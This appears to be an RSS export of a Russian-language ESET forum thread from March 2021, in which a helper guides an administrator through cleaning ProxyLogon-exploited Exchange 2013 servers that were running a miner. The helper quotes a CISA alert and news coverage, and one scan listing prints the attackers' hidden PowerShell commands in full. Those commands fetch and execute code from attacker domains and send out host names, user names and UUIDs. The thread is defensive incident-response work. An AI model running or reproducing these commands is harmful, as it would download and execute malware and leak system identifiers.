<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: запуск майнера на серверах с MS Exchange 2013]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме запуск майнера на серверах с MS Exchange 2013 форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Thu, 23 Apr 2026 18:00:53 +0300</pubDate>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112166/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<B>Устранение уязвимостей Microsoft Exchange Server </B><br /><br /><br />====quote====<br />Партнеры по кибербезопасности и безопасности инфраструктуры (CISA) наблюдали активное использование уязвимостей в продуктах Microsoft Exchange Server. Успешное использование этих уязвимостей позволяет злоумышленнику, не прошедшему проверку подлинности, выполнить произвольный код на уязвимых серверах Exchange Server, что позволяет злоумышленнику получить постоянный доступ к системе, а также доступ к файлам и почтовым ящикам на сервере и учетным данным, хранящимся в этой системе. Успешная эксплуатация может дополнительно позволить злоумышленнику нарушить доверие и идентификацию в уязвимой сети. Microsoft выпустила внеполосные патчи для устранения уязвимостей в Microsoft Exchange Server. Уязвимости влияют на локальные серверы Microsoft Exchange и, как известно, не влияют на облачные почтовые службы Exchange Online или Microsoft 365 (ранее O365).<br /><br />Это предупреждение включает в себя как тактику, методы и процедуры (TTP), так и индикаторы компрометации (IOC), связанные с этой злонамеренной деятельностью. Чтобы обезопасить себя от этой угрозы, CISA рекомендует организациям проверять свои системы на предмет наличия TTP и использовать IOC для обнаружения любых вредоносных действий. Если организация обнаруживает действия по эксплуатации, она должна предположить компрометацию сетевой идентичности и следовать процедурам реагирования на инциденты. Если организация не обнаруживает активности, она должна немедленно применить доступные исправления и реализовать меры по снижению риска, указанные в этом предупреждении. <br /><br />=============<br />подробнее здесь:<br /><noindex><a href="https://us-cert.cisa.gov/ncas/alerts/aa21-062a" target="_blank" rel="nofollow">https://us-cert.cisa.gov/ncas/alerts/aa21-062a</a></noindex> <br />
			<i>18.03.2021 16:49:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112166/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112166/</guid>
			<pubDate>Thu, 18 Mar 2021 16:49:17 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112161/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			задачи, которые были запущены через powershell(Имя компьютера: SPHVMAIL01), проверьте так же наличие новых учетных записей в домене.<br /><br /><br />====quote====<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; POWERSHELL.EXE<br /><br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано Microsoft Windows<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Оригинальное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;PowerShell.EXE.MUI<br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;6.3.9600.17396 (winblue_r4.141007-2030)<br />Описание &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Windows PowerShell<br />Производитель &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Microsoft Corporation<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))<br />CmdLine &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;9F1E24917EF96BBB339F4E2A226ACAFD1009F47B<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; C031E215B8B08C752BF362F6D4C5D3AD<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\JCA9PD<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZ<WBR/>&shy;Y4OWX<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\O6YM9I<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылка &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN<br /><br />=============<br /> <br />
			<i>18.03.2021 07:27:19, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112161/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112161/</guid>
			<pubDate>Thu, 18 Mar 2021 07:27:19 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112160/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_r9xdllyc" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />[QUOTE]  Владимир  Шариков  написал:<br />Что этот код делает? Стоит ли боятся "Последствий" этой бяки?<br />=============<br /> я думаю стоит. &nbsp;эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)<br /><br />====quote====<br />После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.<br /><br />ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.<br /><br />Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.<br /><br />В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.<br />=============<br /><br /><br />====quote====<br />Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена».<br /><br />«Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.<br />=============<br /><br />более подробно, здесь<br /> <noindex><a href="https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/</a></noindex> <br />
			<i>18.03.2021 04:53:31, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112160/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112160/</guid>
			<pubDate>Thu, 18 Mar 2021 04:53:31 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112158/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_TIwVGdDj" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)<br />=============<br /><br />это на клиентских системах происходит? <br />
			<i>18.03.2021 04:44:05, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112158/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112158/</guid>
			<pubDate>Thu, 18 Mar 2021 04:44:05 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112157/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_Y0ZEx8x3" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Что этот код делает? Стоит ли боятся "Последствий" этой бяки?<br />=============<br /><br /><B>я думаю стоит.</B> эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)<br /><br /><br />====quote====<br />После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.<br /><br />ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.<br /><br />Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.<br /><br />В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.<br /><br />=============<br /><br />более подробно, здесь<br /><noindex><a href="https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/</a></noindex> <br />
			<i>18.03.2021 04:37:50, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112157/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112157/</guid>
			<pubDate>Thu, 18 Mar 2021 04:37:50 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112147/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_C2cl7NpR" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />скриншот не увидел или не прикрепился<br />=============<br />да, теперь вижу. файл лучше отправить на virustotal.com для проверки другими антивирусами. возможно, и бэкдор <br />
			<i>17.03.2021 18:22:27, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112147/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112147/</guid>
			<pubDate>Wed, 17 Mar 2021 18:22:27 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112146/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_I2gZIfWN" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />твик 39 что то найти не могу, найду.Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)<br />=============<br /><br />uVS - дополнительно-твики. твик 39 в низу окна. <br /><br />скриншот не увидел или не прикрепился <br />
			<i>17.03.2021 18:20:14, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112146/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112146/</guid>
			<pubDate>Wed, 17 Mar 2021 18:20:14 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112145/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_L2plf3lY" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />если будет возможность перегрузить сервера,<br />выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,<br />возможно получиться увидеть, кто &nbsp;эти задачи создает.<br />(при условии, конечно, если они будут воссозданы)<br /><br /> &nbsp; <br />=============<br />твик 39 что то найти не могу, найду.<br />Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот) <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118954&" width="1252" height="845" /><br /><i>17.03.2021 18:15:38, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112145/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112145/</guid>
			<pubDate>Wed, 17 Mar 2021 18:15:38 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112144/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			если будет возможность перегрузить сервера,<br />выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,<br />возможно получиться увидеть, кто &nbsp;эти задачи создает.<br />(при условии, конечно, если они будут воссозданы)<br /><br />[FILE ID=118952] <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118952&" width="667" height="45" /><br /><i>17.03.2021 17:58:21, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112144/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112144/</guid>
			<pubDate>Wed, 17 Mar 2021 17:58:21 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112143/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			по второму серверу:<br /><br />выполняем скрипт в uVS:<br />- скопировать содержимое кода в буфер обмена;<br />- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;<br />- закрываем все браузеры перед выполнением скрипта;<br />
====code====
<pre>

;uVS v4.11.6 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
apply

QUIT
</pre>
=============
<br />без перезагрузка, пишем о старых и новых проблемах.<br />------------ <br />
			<i>17.03.2021 17:54:46, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112143/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112143/</guid>
			<pubDate>Wed, 17 Mar 2021 17:54:46 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112142/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_lq0ipIUa" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br /><br />====quote====<br /> &nbsp;Владимир &nbsp;Шариков &nbsp;написал:<br /><br />====quote====<br /> &nbsp;santy &nbsp;написал:<br /><br />====quote====<br /> &nbsp;Владимир &nbsp;Шариков &nbsp;написал:<br />Положу сюда сразу два образа двух серверов.<br />=============<br />можно и второй образ положить<br />=============<br /><br />=============<br />по второму серверу:<br />это нормальный софт?<br />C:\PROGRAM FILES\WIN-ACME\WACS.EXE<br />--RENEW --BASEURI &quot;<noindex><a href="HTTPS://ACME-V02.API.LETSENCRYPT.ORG/&quot;" target="_blank" rel="nofollow">HTTPS://ACME-V02.API.LETSENCRYPT.ORG/&amp;quot</a></noindex>;<br />=============<br />Да, это сертификаты обновляет. &nbsp; <br />
			<i>17.03.2021 17:52:53, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112142/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112142/</guid>
			<pubDate>Wed, 17 Mar 2021 17:52:53 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112141/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_BH5Dw9Ct" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br /><br />====quote====<br /> &nbsp;santy &nbsp;написал:<br /><br />====quote====<br /> &nbsp;Владимир &nbsp;Шариков &nbsp;написал:<br />Положу сюда сразу два образа двух серверов.<br />=============<br />можно и второй образ положить<br />=============<br /><br />=============<br /><br />по второму серверу:<br />это нормальный софт?<br />C:\PROGRAM FILES\WIN-ACME\WACS.EXE<br />--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/" <br />
			<i>17.03.2021 17:50:43, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112141/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112141/</guid>
			<pubDate>Wed, 17 Mar 2021 17:50:43 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112140/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_M2Fejn6t" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br /><br />====quote====<br /> &nbsp;Владимир &nbsp;Шариков &nbsp;написал:<br />Положу сюда сразу два образа двух серверов.<br />=============<br />можно и второй образ положить<br />=============<br /> <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=118951">IZTVMAIL01_2021-03-17_16-52-35_v4.11.6.7z</a><br /><i>17.03.2021 17:45:03, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112140/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112140/</guid>
			<pubDate>Wed, 17 Mar 2021 17:45:03 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16364/message112139/">запуск майнера на серверах с MS Exchange 2013</a></b> <i>ProxyLogon</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_Wt3FRI3K" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Положу сюда сразу два образа двух серверов.<br />=============<br /><br />можно и второй образ положить <br />
			<i>17.03.2021 17:37:31, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16364/message112139/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16364/message112139/</guid>
			<pubDate>Wed, 17 Mar 2021 17:37:31 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
